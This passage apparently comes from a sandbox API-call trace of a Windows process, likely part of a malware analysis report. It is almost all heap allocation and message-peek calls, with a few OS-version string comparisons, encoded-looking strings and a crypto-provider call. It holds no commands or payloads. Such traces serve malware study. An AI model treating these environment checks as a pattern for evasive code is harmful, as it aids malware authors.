hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.014] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0248.014] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.015] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.015] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.016] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.016] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.016] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0248.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0248.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0248.017] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.017] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.017] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0248.017] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.017] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0248.017] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0248.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0248.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0248.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0248.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.018] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2720) returned 1 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0248.019] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0248.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0248.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0248.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0248.028] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.028] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0248.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.029] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0248.030] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.030] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.030] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0248.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0248.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.031] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.032] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0248.032] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.032] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.032] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0248.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.032] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.033] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0248.033] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.033] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.034] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, 